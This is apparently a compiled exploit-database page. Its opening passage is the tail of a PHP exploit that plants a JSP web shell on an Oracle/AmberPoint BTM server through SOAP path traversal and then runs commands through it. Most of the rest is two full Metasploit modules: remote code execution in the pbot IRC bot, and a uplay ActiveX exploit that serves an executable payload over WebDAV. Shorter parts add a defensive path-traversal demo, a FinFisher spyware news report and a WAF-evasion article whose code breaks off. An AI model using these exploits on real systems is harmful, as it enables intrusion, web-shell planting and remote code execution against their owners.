              '\server\examples\build\mainWebApp\WEB-INF\classes\mainWebApp#');

for ($i = 0; $i < count($path); $i++) {
    $soap = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:int="http://schemas.amberpoint.com/flashtunnel/interfaces" xmlns:typ="http://schemas.amberpoint.com/flashtunnel/types">
   <soapenv:Header/>
   <soapenv:Body>
      <int:writeToFileRequest>
         <int:writeToFile handle="..\..\..\..\..\..\..\..\..\..'.$path[$i].'\suntzu.jsp">
            <typ:text>'.$code.'</typ:text>
            <typ:WriteToFileRequestVersion>
            </typ:WriteToFileRequestVersion>
         </int:writeToFile>
      </int:writeToFileRequest>
   </soapenv:Body>
</soapenv:Envelope>';

    $url = "http://$host:$port/btmui/soa/flash_svc/";
    $out = _s($url, 1, "", $soap);
    //print($out."\n");
    sleep(1);
}

// run the command through the dropped JSP, capturing output into a web-readable file
$cmd = "cmd.exe /c ".$cmd." > ../../server/examples/build/mainWebApp/sh.txt";
$url = "http://$host:$port/suntzu.jsp?cmd=".urlencode($cmd);
$out = _s($url, 0, "", "");
//print($out."\n");
sleep(2);

// fetch the command output
$url = "http://$host:$port/sh.txt";
$out = _s($url, 0, "", "");
print($out."\n");
?>

Source
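Added example for the two FlashTunnelService advisories above (deleteFile and writeToFile); this is not rgod's code and not Oracle's. Both vulnerable methods hand the SOAP 'handle' attribute to getFileFromHandle() and then delete or write the resulting File. getFileFromHandle() itself is not shown in the advisories; that the traversal succeeds implies the handle is joined onto a base directory with no containment check, which is what vulnerable_file_from_handle() below models as an assumption. safe_file_from_handle() is the check that was missing. The base directory, the "benign" handle and the function names are constructed for the demo; the traversal handles are the shapes the advisories use. Paths are treated POSIX-style after mapping '\' to '/', so the demo gives the same answers on Linux as the Windows target in the advisory would.

```python
"""
Handle -> file resolution for a FlashTunnelService-style SOAP endpoint:
the assumed vulnerable form beside a hardened form, plus the XML escaping
the writeToFile advisory describes as "convert the code to html entities".
Added example; not code from the advisories or from Oracle.
"""
import posixpath
from xml.sax.saxutils import escape


class TraversalError(ValueError):
    """Raised when a handle would resolve outside the service's base directory."""


def _normalize(handle: str) -> str:
    # Java's File on Windows accepts both separators; an attacker can pick either,
    # so any check must treat them the way the target will.
    return handle.replace("\\", "/")


def vulnerable_file_from_handle(base_dir: str, handle: str) -> str:
    """Assumed shape of the flaw (getFileFromHandle is not in the advisory): join the
    client-supplied handle onto base_dir and use the result. A run of '../' or '..\\'
    walks out of base_dir; extra '..' at the root are silently dropped, which is why
    the PoCs use far more of them than strictly needed."""
    return posixpath.normpath(posixpath.join(_normalize(base_dir), _normalize(handle)))


def safe_file_from_handle(base_dir: str, handle: str) -> str:
    """Hardened resolution: reject absolute handles and drive letters, canonicalize,
    and require the result to remain under base_dir. Raises TraversalError otherwise."""
    base = posixpath.normpath(_normalize(base_dir))
    norm = _normalize(handle)
    if norm.startswith("/") or (len(norm) > 1 and norm[1] == ":"):
        raise TraversalError("absolute handle rejected: %r" % handle)
    target = posixpath.normpath(posixpath.join(base, norm))
    if target != base and not target.startswith(base.rstrip("/") + "/"):
        raise TraversalError("handle escapes base directory: %r" % handle)
    return target


def escapes_base(base_dir: str, handle: str) -> bool:
    """True if the handle would have resolved outside base_dir, i.e. the check was needed."""
    try:
        safe_file_from_handle(base_dir, handle)
        return False
    except TraversalError:
        return True


def text_element(payload: str) -> str:
    """The advisory says the JSP must be converted to HTML entities before it goes into
    <typ:text>; in XML terms that is ordinary escaping of the text node, which the
    server undoes when it parses the envelope. Returns the element as it is sent."""
    return "<typ:text>%s</typ:text>" % escape(payload)


# Constructed base directory (not a real BTM path) and the handle shapes from the advisories.
BASE = "/opt/btm/flashtunnel"
DELETE_HANDLE = "../../../../../../../../../../../../boot.ini"
WRITE_HANDLE = "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\server\\examples\\build\\mainWebApp\\suntzu.jsp"


def demo() -> dict:
    """Resolve the advisories' handles and a benign one; return what each resolution yields."""
    result = {}
    for name, handle in (("deleteFile", DELETE_HANDLE),
                         ("writeToFile", WRITE_HANDLE),
                         ("benign", "uploads/report.txt")):
        result[name] = {
            "vulnerable": vulnerable_file_from_handle(BASE, handle),
            "escapes": escapes_base(BASE, handle),
        }
    return result


if __name__ == "__main__":
    for name, r in demo().items():
        print("%-12s -> %-48s escapes base: %s" % (name, r["vulnerable"], r["escapes"]))
    print(text_element('<%@ page import="java.io.*" %>'))
```

The containment test compares canonical paths rather than looking for ".." in the handle: a blacklist on ".." misses encodings and separator tricks, while "resolve, then check the prefix" holds regardless of how the traversal was spelled. On the real service the equivalent in Java would be File.getCanonicalPath() on both the base and the joined result before the prefix comparison.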
-
also, a "more recent exploit", similar, also published on exploit-db:

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PHP IRC Bot pbot eval() Remote Code Execution',
      'Description'    => %q{
          This module allows remote command execution on the PHP IRC bot pbot by
        abusing the usage of eval() in the implementation of the .php command. In
        order to work, the data to connect to the IRC server and the channel where
        pbot can be found must be provided. The module has been successfully tested
        on the version of pbot analyzed by Jay Turla, and published on Infosec
        Institute, running over Ubuntu 10.04 and Windows XP SP3.
      },
      'Author'         =>
        [
          'evilcry', # pbot analysis
          'Jay Turla', # pbot analysis
          '@bwallHatesTwits', # PoC
          'juan vazquez' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'EDB', '20168' ],
          [ 'URL', 'http://offensivecomputing.net/?q=node/1417'],
          [ 'URL', 'http://resources.infosecinstitute.com/pbot-analysis/']
        ],
      'Platform'       => [ 'unix', 'win'],
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Space'       => 344, # According to RFC 2812, the max length message is 512, including the cr-lf
          'BadChars'    => '',
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
            }
        },
      'Targets'        =>
        [
          [ 'pbot', { } ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Nov 02 2009',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(6667),
        OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
        OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
        OptString.new('CHANNEL', [true, 'IRC Channel', '#channel']),
        OptString.new('PBOT_PASSWORD', [false, 'pbot Password', ''])
      ], self.class)
  end

  def check
    connect

    response = register(sock)
    if response =~ /463/ or response =~ /464/
      print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
      return Exploit::CheckCode::Unknown
    end

    response = join(sock)
    if not response =~ /353/ and not response =~ /366/
      print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
      return Exploit::CheckCode::Unknown
    end

    response = pbot_login(sock)
    quit(sock)
    disconnect

    if response =~ /auth/ and response =~ /logged in/
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
  end

  # Write one IRC message and drain whatever the server answers within the timeout
  def send_msg(sock, data)
    sock.put(data)
    data = ""
    begin
      read_data = sock.get_once(-1, 1)
      while not read_data.nil?
        data << read_data
        read_data = sock.get_once(-1, 1)
      end
    rescue EOFError
    end
    data
  end

  # PASS (optional) / NICK / USER registration with the IRC server
  def register(sock)
    msg = ""

    if datastore['IRC_PASSWORD'] and not datastore['IRC_PASSWORD'].empty?
      msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"
    end

    if datastore['NICK'].length > 9
      nick = rand_text_alpha(9)
      print_error("The nick is longer than 9 characters, using #{nick}")
    else
      nick = datastore['NICK']
    end

    msg << "NICK #{nick}\r\n"
    msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"
    response = send_msg(sock,msg)
    return response
  end

  def join(sock)
    join_msg = "JOIN #{datastore['CHANNEL']}\r\n"
    response = send_msg(sock, join_msg)
    return response
  end

  # pbot's own ".login [password]" command, sent to the channel
  def pbot_login(sock)
    login_msg = "PRIVMSG #{datastore['CHANNEL']} :.login"
    if datastore['PBOT_PASSWORD'] and not datastore['PBOT_PASSWORD'].empty?
      login_msg << " #{datastore['PBOT_PASSWORD']}"
    end
    login_msg << "\r\n"
    response = send_msg(sock, login_msg)
    return response
  end

  # ".php <anything> <code>" is passed to eval() by the bot; base64 keeps the payload
  # free of characters that IRC or the bot's parser would mangle
  def pbot_command(sock)
    encoded = Rex::Text.encode_base64(payload.encoded)
    command_msg = "PRIVMSG #{datastore['CHANNEL']} :.php #{rand_text_alpha(1)} passthru(base64_decode(\"#{encoded}\"));\r\n"
    response = send_msg(sock, command_msg)
    return response
  end

  def quit(sock)
    quit_msg = "QUIT :bye bye\r\n"
    sock.put(quit_msg)
  end

  def exploit
    connect

    print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
    response = register(sock)
    if response =~ /463/ or response =~ /464/
      print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
      return
    end

    print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")
    response = join(sock)
    if not response =~ /353/ and not response =~ /366/
      print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
      return
    end

    print_status("#{rhost}:#{rport} - Registering with the pbot...")
    response = pbot_login(sock)
    if not response =~ /auth/ or not response =~ /logged in/
      print_error("#{rhost}:#{rport} - Error registering with the pbot")
      return
    end

    print_status("#{rhost}:#{rport} - Exploiting the pbot...")
    pbot_command(sock)

    quit(sock)
    disconnect
  end
end
-
also, on Exploit-DB:

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Ubisoft uplay 2.0.3 Active X Control Arbitrary Code Execution',
      'Description'    => %q{
          The uplay ActiveX component allows an attacker to execute any command line action.
        User must sign in, unless auto-sign in is enabled and uplay must not already be
        running. Due to the way the malicious executable is served (WebDAV), the module
        must be run on port 80, so please make sure you have enough privilege to do that.
        Ubisoft released patch 2.04 as of Mon 20th July.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Tavis Ormandy <taviso[at]cmpxchg8b.com>', # Initial discovery
          'Ben Campbell <eat_meatballs[at]hotmail.co.uk>',
          'phillips321 <phillips321[at]phillips321.co.uk>',
          'Richard Hicks <scriptmonkeyblog[at]gmail.com>'
        ],
      'References'     =>
        [
          [ 'OSVDB', '84402'],
          [ 'URL', 'http://seclists.org/fulldisclosure/2012/Jul/375']
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jul 29 2012'))

    register_options(
      [
        OptPort.new('SRVPORT',       [true, "The daemon port to listen on (do not change)", 80]),
        OptString.new('URIPATH',     [true, "The URI to use (do not change).", "/"]),
        OptString.new('EXPLOITPATH', [false, "The URI to use for the exploit"])
      ], self.class)

    # WebDAV does not support SSL and must run over port 80.
    deregister_options('SSL', 'SSLVersion', 'SSLCert', 'SRVPORT' 'URIPATH')
  end

  def autofilter
    false
  end

  def check_dependencies
    use_zlib
  end

  def is_exploitable?(req)
    # Only engage Win XP SP3 targets
    req.headers['User-Agent'] =~ /NT 5\.1/
  end

  # Dispatch: WebDAV verbs from the Mini-Redirector, the exploit page, or the payload
  def on_request_uri(cli, request)
    case request.method
    when 'OPTIONS'
      process_options(cli, request)
    when 'PROPFIND'
      process_propfind(cli, request)
    when 'GET'
      if request.uri_parts['Resource'].include? @uplay_uri
        if is_exploitable?(request)
          prompt_uplay(cli, request)
        else
          print_error("Not the target we want, will not engage.")
          resp = create_response(404, "Not Found")
          resp.body = ""
          resp['Content-Type'] = 'text/html'
          cli.send_response(resp)
        end
      else
        process_get(cli, request)
      end
    else
      vprint_status("#{request.method} => 404 (#{request.uri})")
      resp = create_response(404, "Not Found")
      resp.body = ""
      resp['Content-Type'] = 'text/html'
      cli.send_response(resp)
    end
  end

  # Serve the page that instantiates the uplay control and hands it the UNC path of
  # the payload through -orbit_exe_path (base64 encoded, as the control expects)
  def prompt_uplay(cli, request)
    url = "http://"
    url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
    url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/"

    path = "#{@exploit_unc}#{@share_name}\\#{@basename}.exe"
    if path.length > 693
      fail_with(Exploit::Failure::Unknown, "Remote path is too long must be < 694 characters")
      return
    end
    cmd = Rex::Text.encode_base64(path)

    classid = "clsid:1c492e6a-2803-5ed7-83e1-1b1d4d41eb39"
    type = "application/x-uplaypc" # Unused but alternative to classid

    content = %Q|<html>
<body>
<script>
x = document.createElement('OBJECT');
x.classid='#{classid}';
document.body.appendChild(x);
x.open('-orbit_product_id 1 -orbit_exe_path #{cmd} -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play');
</script>
</body>
</html>|

    print_status("GET => Exploit")
    send_response_html(cli, content)
    handler(cli)
  end

  def process_get(cli, request)
    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
    webdav = "\\\\#{myhost}\\"

    if blacklisted_path?(request.uri)
      vprint_status("GET => 404 [BLACKLIST] (#{request.uri})")
      resp = create_response(404, "Not Found")
      resp.body = ""
      cli.send_response(resp)
      return
    end

    if (request.uri.include? @basename)
      print_status("GET => Payload")
      return if ((p = regenerate_payload(cli)) == nil)
      data = generate_payload_exe({ :code => p.encoded })
      send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
      return
    end

    # Treat index.html specially
    if (request.uri[-1,1] == "/" or request.uri =~ /index\.html?$/i)
      vprint_status("GET => REDIRECT (#{request.uri})")
      resp = create_response(200, "OK")
      resp.body = %Q|<html><head><meta http-equiv="refresh" content="0;URL=#{@exploit_unc}#{@share_name}\\"></head><body></body></html>|
      resp['Content-Type'] = 'text/html'
      cli.send_response(resp)
      return
    end

    # Anything else is probably a request for a data file...
    vprint_status("GET => DATA (#{request.uri})")
    data = "HELLO!"
    send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
  end

  #
  # OPTIONS requests sent by the WebDav Mini-Redirector
  #
  def process_options(cli, request)
    vprint_status("OPTIONS #{request.uri}")
    headers = {
      'MS-Author-Via' => 'DAV',
      'DASL'          => '<DAV:sql>',
      'DAV'           => '1, 2',
      'Allow'         => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',
      'Public'        => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK',
      'Cache-Control' => 'private'
    }
    resp = create_response(207, "Multi-Status")
    headers.each_pair {|k,v| resp[k] = v }
    resp.body = ""
    resp['Content-Type'] = 'text/xml'
    cli.send_response(resp)
  end

  #
  # PROPFIND requests sent by the WebDav Mini-Redirector
  #
  def process_propfind(cli, request)
    path = request.uri
    vprint_status("PROPFIND #{path}")

    body = ''

    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
    my_uri  = "http://#{my_host}/"

    if path !~ /\/$/

      if blacklisted_path?(path)
        vprint_status "PROPFIND => 404 (#{path})"
        resp = create_response(404, "Not Found")
        resp.body = ""
        cli.send_response(resp)
        return
      end

      if path.index(".")
        vprint_status "PROPFIND => 207 File (#{path})"
        body = %Q|<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:" xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/">
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype/>
<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
<lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength>
<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
<lp2:executable>T</lp2:executable>
<D:supportedlock>
<D:lockentry>
<D:lockscope><D:exclusive/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
<D:lockentry>
<D:lockscope><D:shared/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
</D:supportedlock>
<D:lockdiscovery/>
<D:getcontenttype>application/octet-stream</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
</D:multistatus>
|
        # send the response
        resp = create_response(207, "Multi-Status")
        resp.body = body
        resp['Content-Type'] = 'text/xml; charset="utf8"'
        cli.send_response(resp)
        return
      else
        vprint_status "PROPFIND => 301 (#{path})"
        resp = create_response(301, "Moved")
        resp["Location"] = path + "/"
        resp['Content-Type'] = 'text/html'
        cli.send_response(resp)
        return
      end
    end

    vprint_status "PROPFIND => 207 Directory (#{path})"
    body = %Q|<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:" xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/">
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype><D:collection/></lp1:resourcetype>
<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
<D:supportedlock>
<D:lockentry>
<D:lockscope><D:exclusive/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
<D:lockentry>
<D:lockscope><D:shared/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
</D:supportedlock>
<D:lockdiscovery/>
<D:getcontenttype>httpd/unix-directory</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
|

    if request["Depth"].to_i > 0
      trail = path.split("/")
      trail.shift
      case trail.length
      when 0
        body << generate_shares(path)
      when 1
        body << generate_files(path)
      end
    else
      vprint_status "PROPFIND => 207 Top-Level Directory"
    end

    body << "</D:multistatus>"
    body.gsub!(/\t/, '')

    # send the response
    resp = create_response(207, "Multi-Status")
    resp.body = body
    resp['Content-Type'] = 'text/xml; charset="utf8"'
    cli.send_response(resp)
  end

  def generate_shares(path)
    share_name = @share_name
    %Q|
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}#{share_name}/</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype><D:collection/></lp1:resourcetype>
<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
<D:supportedlock>
<D:lockentry>
<D:lockscope><D:exclusive/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
<D:lockentry>
<D:lockscope><D:shared/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
</D:supportedlock>
<D:lockdiscovery/>
<D:getcontenttype>httpd/unix-directory</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
|
  end

  def generate_files(path)
    trail = path.split("/")
    return "" if trail.length < 2

    base  = @basename
    exts  = @extensions.gsub(",", " ").split(/\s+/)
    files = ""

    exts.each do |ext|
      files << %Q|
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}#{base}.#{ext}</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype/>
<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
<lp1:getcontentlength>#{rand(0x10000)+120}</lp1:getcontentlength>
<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
<lp2:executable>T</lp2:executable>
<D:supportedlock>
<D:lockentry>
<D:lockscope><D:exclusive/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
<D:lockentry>
<D:lockscope><D:shared/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
</D:supportedlock>
<D:lockdiscovery/>
<D:getcontenttype>application/octet-stream</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
<D:ishidden b:dt="boolean">1</D:ishidden>
</D:propstat>
</D:response>
|
    end

    files
  end

  def gen_timestamp(ttype=nil)
    ::Time.now.strftime("%a, %d %b %Y %H:%M:%S GMT")
  end

  def gen_datestamp(ttype=nil)
    ::Time.now.strftime("%Y-%m-%dT%H:%M:%SZ")
  end

  # This method rejects requests that are known to break exploitation
  def blacklisted_path?(uri)
    share_path = "/#{@share_name}"
    payload_path = "#{share_path}/#{@basename}.exe"
    case uri
    when payload_path
      return false
    when share_path
      return false
    else
      return true
    end
  end

  def exploit
    @basename = rand_text_alpha(8)
    @share_name = rand_text_alpha(8)
    @extensions = "exe"
    if datastore['EXPLOITPATH']
      @uplay_uri = datastore['EXPLOITPATH']
    else
      @uplay_uri = rand_text_alpha(8)
    end

    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
    @exploit_unc = "\\\\#{myhost}\\"

    if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
      fail_with(Exploit::Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')
    end

    vprint_status("Payload available at #{@exploit_unc}#{@share_name}\\#{@basename}.exe")
    print_good("Please let your victim browse to this exploit URI: http://#{myhost}:#{datastore['SRVPORT']}/#{@uplay_uri}")

    super
  end
end
-
There are signs that the FinFisher "lawful interception" spyware may be installed on command-and-control computers in at least ten different countries, including the United States, according to new research from Rapid7.

Rapid7 researchers analyzed the FinFisher samples obtained from Bahrain to understand how the spyware communicates with its command-and-control computer, according to Claudio Guarnieri, a security researcher with Rapid7. He then looked for those attributes in a global scan of computers on the Internet, and found matches in Australia, Czech Republic, United Arab Emirates, Ethiopia, Estonia, Indonesia, Latvia, Mongolia, Qatar, and the United States, Guarnieri noted in a blog post on Wednesday.

FinFisher secretly monitors computers by turning on webcams, recording everything the user types with a keylogger, and intercepting Skype calls. It can also remotely take control of a computer. Gamma International Gmbh, a British company, sells the tool to law enforcement agencies and governments.

"We are not able to determine whether they're [detected machines] actually being used by any government agency, if they are operated by local people or if they are completely unrelated at all," Guarnieri wrote. The matches simply indicate that these computers exhibit the "unique behavior associated with what is believed to be the FinFisher infrastructure," Guarnieri wrote.

He found that when computers attempted to connect to a server in Bahrain, which had been previously identified by researchers at CitizenLab.org for using FinFisher, the server responded with the message "Hallo Steffi." Guarnieri found this pattern in computers located in Australia, Czech Republic, United Arab Emirates, Ethiopia, Estonia, Indonesia, Latvia, Mongolia, Qatar, and the United States, and pinpointed the IP addresses.

At this time, only the Latvian server is still responding with the message, and all the other machines are "instantly dropping the connection in the exact same way," Guarnieri said.

It's not known whether the US-based server identified by Guarnieri is associated with law enforcement or the federal government, or whether a private entity has gotten their hands on the tool. It's also unclear which of the countries identified by Guarnieri are in fact Gamma clients.

Gamma International has steadfastly claimed the company only sells FinFisher to governments and not to private actors. That isn't a very reassuring statement, as there is nothing stopping someone from turning around and reselling it to someone outside the government.

"Once in the hands of local police, it might be resold/lost/leaked to other parties, who could then use it against the US/US companies/US persons," security and privacy researcher Chris Soghoian told SecurityWeek over email.

Human rights activists and security experts have been aware of FinFisher and the possibility of the tool being used to spy on activists and regular citizens, but there haven't been any samples to analyze until recently. In December, WikiLeaks published promotional videos from Gamma that showed how law enforcement agencies could plant FinFisher to monitor a suspect. Mikko Hypponen, chief research officer at F-Secure, said in March the company was looking for a sample in order to add detection to its security software to protect customers "from attack programs, regardless of the source of such programs."

The first known analysis of FinFisher came from CitizenLab.org in July. The researchers received multiple attack emails containing suspicious attachments that had been sent to several activists based in Bahrain. After some analysis, they determined the attachments were all part of the same malware family and linked the Trojan to Gamma's FinFisher spyware tool.

Martin Muench, a managing director at Gamma International, told Bloomberg last month the company hadn't sold FinFisher to Bahrain. He said it was likely that an old demonstration version had been copied illegally and modified for malicious use.

The malware sample Guarnieri analyzed was disguised as an image file. When opened, the file created a directory and dropped a copy of itself in the new location, Guarnieri wrote in the report. The newly created directory was used for storing dumped data, logs, and screenshots, which were later transferred to a remote command-and-control server.

Source
-
Hackers’ Investment in Evasion Techniques Proves That They See Web Applications as a Valuable Attack Surface

Network security devices, such as network antivirus (AV) solutions or web application firewalls, protect computer systems by stopping malicious traffic before it even reaches them. In order to assess whether the examined traffic is malicious or benign, the security device typically needs to mimic the processing done on the protected system. If the security device interprets the traffic in a different way than the protected system, a semantic gap is created. The attackers can use that semantic gap in order to create traffic that will bypass the security device and still create a malicious effect on the protected system. The exploitation of a semantic gap is often called an “evasion technique”.

For example, a common rule in network antivirus solutions is to block the transfer of executable files. A naïve antivirus implementation might assess whether a file is an executable based solely on the file extension, while modern operating systems ignore the extension and rely on file headers, thus creating a semantic gap. The attacker can exploit the semantic gap with the following “evasion technique”: simply renaming the executable file extension from “.exe” to “.txt”.

I would like to show why evasion techniques are actually a good thing, as they provide validation for the security market and allow able network security devices to increase the security of the protected systems.

Mind the semantic gap

Earlier this year, researchers from the University of Texas published an excellent paper on network antivirus evasion. They give a few reasons why it is very difficult to write a “perfect” processor that precisely replicates the processing semantics of the defended system:

• Protocols are often underspecified: Not all corner cases are covered by the protocol specification. For others, the description exists, but may be lacking or vague.
• Formats and protocols are usually complex: Replicating the behavior of a given processor is hard. For example, after many years of testing, there are still hundreds of file-parsing discrepancies between OpenOffice and MS Office.
• Lax implementation of the protocol in the application: In order to handle even malformed messages, application processing algorithms are much looser than the format specification.

Each time two (or more) vendors implement the processing of a certain element in a different way, a virtual junction is created. The network security device has to choose a processing path in that junction. The road not taken usually represents an evasion technique.

Evasion is the hackers’ sincerest form of flattery

Over the years, a lot of research has been conducted on semantic gaps in the web application arena. Web Application Firewall (WAF) evasion techniques have been published based on semantic gaps in application and web servers. Moreover, the hacker community is actually using evasion techniques, as SQL injection tools such as Havij and SQLmap contain some explicit anti-WAF evasions. Hackers’ investment in evasion techniques proves that hackers view web applications as a valuable attack surface and that WAFs are a threat for them; otherwise they would not bother with eluding them.

Planting mines on the road not taken

We have seen that an evasion technique creates a junction and the WAF must follow the appropriate trail, the same trail the defended application takes. How would a good WAF know the right trail?

• Choose the correct path with flexible parsing: allow WAF parsing to be configured according to the specifics of the defended servers, thus providing support for specific implementation anomalies and bugs.
• Don’t go into dark alleys and avoid unnecessary junctions by using:
  o Protocol hardening: Detect deviations from the protocol to defend against evasion techniques that abuse lax protocol implementation on the server side.
  o Positive security model hardening: Learn the usual operation of the web application to detect deviations from the application’s usual operation. Evasion techniques that abuse corner cases in the server-side HTTP implementation will probably deviate from the application’s normal behavior.

A surprising yet very nice corollary of the last argument is the ability to plant mines on the road not taken. The WAF can detect an attack by detecting the mere use of an evasion technique. By using evasion techniques hackers break the most basic principle of hiding as stated by Sherlock Holmes: “the best place to hide something is where everyone can see it”. The evasion technique usage just draws more attention from the WAF and actually helps the WAF to block the attack.

Original Article
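As an added illustration of two points in the article above (the renamed-executable semantic gap, and "planting mines" by treating the use of an evasion as the signal), here is a small Python inspector. It is example code written for this post, not code from the article's author or from any WAF product; the file samples and parameter values are constructed, and the magic-number table covers only PE and ELF.

```python
"""Closing two semantic gaps: (1) classify a file the way an OS loader does, by header
rather than by extension, and report a header/extension mismatch as an evasion signal;
(2) decode URL-encoded parameters strictly and flag encoding tricks that a lax server
might accept but that the specification does not define."""
import re

# Magic numbers of common executable formats (first bytes of the file)
EXECUTABLE_MAGIC = {
    b"MZ": "PE (Windows executable)",
    b"\x7fELF": "ELF (Linux executable)",
}

PCT_ESCAPE = re.compile(r"%[0-9A-Fa-f]{2}")


def executable_by_header(data: bytes):
    """Classify by header, as the operating system does, ignoring the file name."""
    for magic, description in EXECUTABLE_MAGIC.items():
        if data.startswith(magic):
            return description
    return None


def inspect_upload(filename: str, data: bytes):
    """Return (verdict, reason). A naive AV would only look at the extension; here the
    header decides, and a disguised executable is itself reported as an evasion attempt."""
    fmt = executable_by_header(data)
    if fmt is None:
        return ("allow", "no executable header")
    if not filename.lower().endswith(".exe"):
        return ("block", f"evasion: {fmt} disguised as {filename!r}")
    return ("block", f"executable: {fmt}")


def strict_percent_decode(value: str) -> bytes:
    """Decode %XX exactly once. Unlike a lax server, refuse a '%' that is not
    followed by two hex digits instead of silently passing it through."""
    out = bytearray()
    i = 0
    while i < len(value):
        if value[i] == "%":
            if PCT_ESCAPE.match(value, i) is None:
                raise ValueError(f"bad escape at offset {i}")
            out.append(int(value[i + 1:i + 3], 16))
            i += 3
        else:
            out += value[i].encode("utf-8")
            i += 1
    return bytes(out)


def inspect_param(raw: str):
    """Return the list of anomalies in one URL-encoded parameter value. Each anomaly is a
    junction the defended server might take but the specification does not define, so
    the WAF can treat its mere presence as an attack signal (the 'mine')."""
    anomalies = []
    try:
        decoded = strict_percent_decode(raw)
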